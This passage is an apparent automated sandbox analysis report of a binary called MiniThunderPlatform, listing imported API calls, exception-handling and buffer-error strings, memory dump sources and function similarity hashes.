                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?), ref: 1008944C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089474
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 10089484
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 100894AC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,00000000), ref: 100894BC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 100894E4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,00000000), ref: 100894F4
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 1008951C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN), ref: 1008952C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089554
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,00000000), ref: 10089564
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ExceptionThrow$??1?$basic_string@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 687652020-543223747
                                                                                                                                              • Opcode ID: b188b23b1d081b1bb58b8c1037ac9ab940659f60fed9f2f41afee709b6f0d5b2
                                                                                                                                              • Instruction ID: ea1c1417fdaf8e1e167d4f1a0c1484330ca21758ccd825051f4acddc0729eea8
                                                                                                                                              • Opcode Fuzzy Hash: b188b23b1d081b1bb58b8c1037ac9ab940659f60fed9f2f41afee709b6f0d5b2
                                                                                                                                              • Instruction Fuzzy Hash: 01115630A01648CFDB10CF14C58479AB7F0FF45314F1881ADD48A6B281CB36AE49CB41
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalH_prologLeaveSection
                                                                                                                                              • String ID: name
                                                                                                                                              • API String ID: 1127631123-1579384326
                                                                                                                                              • Opcode ID: 589157709b7c399e2b4c823b1cb453c2a3f7a0a03b9d8b7200b30d16ce5de378
                                                                                                                                              • Instruction ID: 0361fa4fcca0a77cfcedaf7b56b5dc3e60f52dca3a33370967eebc0211660263
                                                                                                                                              • Opcode Fuzzy Hash: 589157709b7c399e2b4c823b1cb453c2a3f7a0a03b9d8b7200b30d16ce5de378
                                                                                                                                              • Instruction Fuzzy Hash: EF017C36600110EBC719DF68DC49BAEB3B8EF54210B50811AF81AE7251DF34FD54CA50
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,1008A800,?,?,?,?,?,?), ref: 100BD29F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD2C5
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD296
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: d2d6404c9fd1e394a2e8ba0b90f22d6ee74e9fbf3d058e2de43753bd433301e0
                                                                                                                                              • Instruction ID: ebbc4190c85e9812df72464f77fee8a6a13d68e4700a2c0100f8826676d56bb1
                                                                                                                                              • Opcode Fuzzy Hash: d2d6404c9fd1e394a2e8ba0b90f22d6ee74e9fbf3d058e2de43753bd433301e0
                                                                                                                                              • Instruction Fuzzy Hash: 95112A7A5052409FC308CF08C944E46F7E5FB99720F16CA6EF459973A1D734E841CB85
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD33F
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD365
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD336
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: eeae0fb3c5bb38fd1f9609e541ae9c6f789e7985f4cde9952630bae058721852
                                                                                                                                              • Instruction ID: bd66c0bbb5bc192a66c020f9c502775df1d287d0f8fb75cb7c1a844357254d32
                                                                                                                                              • Opcode Fuzzy Hash: eeae0fb3c5bb38fd1f9609e541ae9c6f789e7985f4cde9952630bae058721852
                                                                                                                                              • Instruction Fuzzy Hash: 4C11187A505640AFC304CF08C944F46F7E5FB99720F1ACA6EE459973A1D734E845CB81
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V01@@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: Content-Type
                                                                                                                                              • API String ID: 2073992192-2058190213
                                                                                                                                              • Opcode ID: e87569ee1720008bdfb80c19bfc165b3d79b3364f7086936f42ff15a75ca1fa1
                                                                                                                                              • Instruction ID: a0b233499089ce77a729b44b781d3f7c7d905298e7fedc6e3c6aad041ef1110d
                                                                                                                                              • Opcode Fuzzy Hash: e87569ee1720008bdfb80c19bfc165b3d79b3364f7086936f42ff15a75ca1fa1
                                                                                                                                              • Instruction Fuzzy Hash: CB01DF32504A62EFC310DF09C894B9AB7E9FB48770F55471AF8A993691D734A880CB91
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,?,?,?,?,1024EB59,000000FF,100BD3E3,?,?,?,1024EB59,000000FF,1008A7E2,?,?), ref: 100BD15F
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD185
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD156
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: ab83609f1f155e82a9813fa7347ace1f5e01347973caabb5f664ee6232bc523f
                                                                                                                                              • Instruction ID: 0c1e5de40957cfd8f6b178014f565ca779cb263101fc1a3edd6dd9fa039d27eb
                                                                                                                                              • Opcode Fuzzy Hash: ab83609f1f155e82a9813fa7347ace1f5e01347973caabb5f664ee6232bc523f
                                                                                                                                              • Instruction Fuzzy Hash: 790157B9905240AFC308CF08C984F46B7E5FB88720F15CA6EF85A973A5D734E840CB85
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD1F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: b614368e0044ae36acd9a3835d521ad9fa5610df45c6a8164b570628e3de54b9
                                                                                                                                              • Instruction ID: 1112c7488eb24902df706e9c42ca0f80dee8d4bd63064d413240cc67e7af2ceb
                                                                                                                                              • Opcode Fuzzy Hash: b614368e0044ae36acd9a3835d521ad9fa5610df45c6a8164b570628e3de54b9
                                                                                                                                              • Instruction Fuzzy Hash: BB0135799092409FC308CF08C988F46B7E5FB88720F19CA6AE859973A5D734E804CF85
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to write!,00000000,1024EB59,000000FF,1008A7B7,?,?,?), ref: 100BD03B
                                                                                                                                                • Part of subcall function 100EABC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100EABF6
                                                                                                                                                • Part of subcall function 100EABC0: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAC24
                                                                                                                                                • Part of subcall function 100EABC0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAC39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95B0), ref: 100BD061
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to write!, xrefs: 100BD032
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to write!
                                                                                                                                              • API String ID: 3827206194-1936633475
                                                                                                                                              • Opcode ID: d6767930152c2ecff134aace475f060e1aa5a7475d68e34e3147f5a517eabffc
                                                                                                                                              • Instruction ID: 022842d5681f2a63725fafb3166641c116b04a95c09f74dd31f2b19ffeb458a5
                                                                                                                                              • Opcode Fuzzy Hash: d6767930152c2ecff134aace475f060e1aa5a7475d68e34e3147f5a517eabffc
                                                                                                                                              • Instruction Fuzzy Hash: AD015A79509680DFC319CF18C994F56BBE4FB8A710F058A9DF05A873A2DB34E844CB06
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!,?,?,00000000,1024EB59,000000FF,1008BC84,?,?,?), ref: 100BD0CB
                                                                                                                                                • Part of subcall function 100EAB20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,00000000,1024EB59,000000FF,1008BC84), ref: 100EAB56
                                                                                                                                                • Part of subcall function 100EAB20: ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100EAB84
                                                                                                                                                • Part of subcall function 100EAB20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100EAB99
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD0F1
                                                                                                                                              Strings
                                                                                                                                              • buffer is insufficient to read!, xrefs: 100BD0C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrow
                                                                                                                                              • String ID: buffer is insufficient to read!
                                                                                                                                              • API String ID: 3827206194-2375833270
                                                                                                                                              • Opcode ID: 539cb0a4cf6e5c093d6b24395bcdd199e3f504fc7c02180303814d3f9c9a7fc1
                                                                                                                                              • Instruction ID: f3715a5dcba01bd6f0d283d43b2dc958dab2348560ee6d47c1c63b7459e681ef
                                                                                                                                              • Opcode Fuzzy Hash: 539cb0a4cf6e5c093d6b24395bcdd199e3f504fc7c02180303814d3f9c9a7fc1
                                                                                                                                              • Instruction Fuzzy Hash: F70113795096809FC319DF18C998F56BBE4FB89720F15CA5DE04A873A2DB34E844CB06
                                                                                                                                              APIs
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71 ref: 10045507
                                                                                                                                              • _CxxThrowException.MSVCR71(102B2A60,102B2A60), ref: 10045517
                                                                                                                                              Strings
                                                                                                                                              • SSL handshake: recv data from server error, throw std exception: , xrefs: 100454FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0exception@@ExceptionThrow
                                                                                                                                              • String ID: SSL handshake: recv data from server error, throw std exception:
                                                                                                                                              • API String ID: 941485209-2071364500
                                                                                                                                              • Opcode ID: 972d60c9e44de16971ace3894fd624d37e489683de934b83f4b92d8c951a0be4
                                                                                                                                              • Instruction ID: c67f6bb4b028bc33af2c275c3c9d4a4829216fa809575c0bcf06bab64c543e8f
                                                                                                                                              • Opcode Fuzzy Hash: 972d60c9e44de16971ace3894fd624d37e489683de934b83f4b92d8c951a0be4
                                                                                                                                              • Instruction Fuzzy Hash: 45F04F35500700AFC324DB69C898DABB7F9FF89220B54895DF84AC7201D732E805CF91
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1006FC80: RtlInitializeCriticalSection.NTDLL(00000030), ref: 1006FCD8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10070156
                                                                                                                                                • Part of subcall function 10014360: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,10118FC7), ref: 10014371
                                                                                                                                                • Part of subcall function 10014360: InterlockedIncrement.KERNEL32(10311E80), ref: 10014383
                                                                                                                                                • Part of subcall function 10014360: RtlInitializeCriticalSection.NTDLL(00000024), ref: 1001438D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10070179
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@CriticalInitializeSection$??1?$basic_string@IncrementInterlockedV01@@
                                                                                                                                              • String ID: CP2spDownload
                                                                                                                                              • API String ID: 792763845-1256050999
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Type,?,00000000,?,?,?,?,00000000,1024AC69,000000FF,100992A7), ref: 10095549
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10095572
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
